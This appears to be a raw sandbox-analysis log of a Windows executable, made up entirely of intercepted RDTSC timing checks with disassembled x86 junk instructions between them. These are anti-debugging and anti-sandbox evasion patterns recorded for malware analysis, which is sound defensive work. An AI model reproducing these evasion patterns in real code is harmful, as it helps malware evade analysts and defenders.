Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E7AAB second address: 4E7B11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f jmp 00007F5BC10A3604h 0x00000014 jmp 00007F5BC10A3605h 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c push ecx 0x0000001d jmp 00007F5BC10A35FBh 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F5BC10A3608h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E83B3 second address: 4E83BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E86A4 second address: 4E86A9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E86A9 second address: 4E86B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E86B9 second address: 4E86BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E86BD second address: 4E86C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E8737 second address: 4E873B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50F248 second address: 50F24D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50F24D second address: 50F252 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50F252 second address: 50F258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50F3DC second address: 50F3E2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50F682 second address: 50F68A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 518A18 second address: 518A3F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5BC10A35F6h 0x00000008 je 00007F5BC10A35F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jg 00007F5BC10A3607h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 517457 second address: 51745B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 517D17 second address: 517D2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F5BC10A35F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d pushad 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 517D2C second address: 517D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 518158 second address: 51815C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 51815C second address: 518164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 518164 second address: 518169 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5182D1 second address: 5182E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jnp 00007F5BC10B709Ch 0x0000000d jl 00007F5BC10B7096h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5182E4 second address: 5182EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5182EA second address: 5182FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 518458 second address: 518468 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F5BC10A35F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 518468 second address: 51846C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 51A4EB second address: 51A4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F5BC10A35FCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 51A4F8 second address: 51A4FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 51A4FC second address: 51A518 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3606h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 51A518 second address: 51A54B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F5BC10B70B5h 0x00000011 pushad 0x00000012 jmp 00007F5BC10B70A3h 0x00000017 push eax 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 51C7AC second address: 51C7B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 51FA27 second address: 51FA2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5243C0 second address: 5243E8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F5BC10A35F8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 jmp 00007F5BC10A3601h 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 524559 second address: 52455D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 523B3E second address: 523B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5BC10A35F6h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F5BC10A3600h 0x00000012 jmp 00007F5BC10A3603h 0x00000017 popad 0x00000018 push esi 0x00000019 pushad 0x0000001a popad 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 524812 second address: 524816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 524816 second address: 524826 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 524826 second address: 524836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F5BC10B7096h 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 524836 second address: 52483C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 52483C second address: 524845 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5249B9 second address: 5249BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5249BD second address: 5249CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5BC10B709Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 524DA9 second address: 524DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F5BC10A35F6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 527BD2 second address: 527BD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 527E99 second address: 527EA3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 527EA3 second address: 527EAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F5BC10B7096h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 527EAF second address: 527EB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 52A5AF second address: 52A5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BC10B70A1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 52A5C4 second address: 52A5CF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 52A26F second address: 52A28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5BC10B70A2h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 52A28A second address: 52A29A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 52A29A second address: 52A2AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F5BC10B7096h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 52E479 second address: 52E494 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5BC10A35FDh 0x0000000b jl 00007F5BC10A3602h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 52EA13 second address: 52EA19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 52EA19 second address: 52EA2F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5BC10A35F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jc 00007F5BC10A35F6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 52EA2F second address: 52EA3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5354C3 second address: 5354F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5BC10A3600h 0x0000000b popad 0x0000000c push ecx 0x0000000d ja 00007F5BC10A35F6h 0x00000013 jns 00007F5BC10A35F6h 0x00000019 pop ecx 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jp 00007F5BC10A35F6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5354F2 second address: 5354F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 533E33 second address: 533E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5BC10A35F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 533E3D second address: 533E41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 533E41 second address: 533E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F5BC10A35F6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 533E4F second address: 533E53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 533E53 second address: 533E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 533FA0 second address: 533FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 533FA4 second address: 533FB8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5BC10A35F6h 0x00000008 jnp 00007F5BC10A35F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5341FA second address: 5341FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5341FE second address: 53420E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5BC10A35F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 53420E second address: 534212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 534363 second address: 534380 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3604h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 534380 second address: 534386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 534386 second address: 53438C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E822D second address: 4E8239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007F5BC10B7096h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E8362 second address: 4E83B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 jmp 00007F5BC10A3607h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jnl 00007F5BC10A35F6h 0x00000014 popad 0x00000015 popad 0x00000016 nop 0x00000017 pushad 0x00000018 mov dword ptr [ebp+12474C7Ah], eax 0x0000001e mov dword ptr [ebp+122D54C2h], eax 0x00000024 popad 0x00000025 push 0000001Eh 0x00000027 mov dword ptr [ebp+122D288Fh], ecx 0x0000002d sub dword ptr [ebp+1247BFE9h], ebx 0x00000033 nop 0x00000034 jp 00007F5BC10A3600h 0x0000003a pushad 0x0000003b pushad 0x0000003c popad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 534665 second address: 534669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 534669 second address: 53466F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 537BB5 second address: 537BBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 537BBB second address: 537BBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 53ECB7 second address: 53ECBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 53ECBB second address: 53ECBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 53F244 second address: 53F25A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 53F25A second address: 53F263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 53FA96 second address: 53FAAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5BC10B70A0h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 53FAAF second address: 53FADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5BC10A3603h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F5BC10A360Ah 0x00000012 jmp 00007F5BC10A35FCh 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 54364A second address: 54364E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 54364E second address: 543652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 543A3F second address: 543A61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A0h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F5BC10B7096h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 543A61 second address: 543A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 543A65 second address: 543A9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A6h 0x00000007 jmp 00007F5BC10B70A0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jnc 00007F5BC10B709Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 545AF6 second address: 545AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 545AFC second address: 545B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 54BBCB second address: 54BBCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 54BBCF second address: 54BBD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 55680B second address: 55680F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 55680F second address: 55681D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5BC10B7096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 55681D second address: 556823 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 554A4A second address: 554A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 554A4E second address: 554A74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F5BC10A35FCh 0x0000000c jnp 00007F5BC10A35F6h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5BC10A35FDh 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 554A74 second address: 554A78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
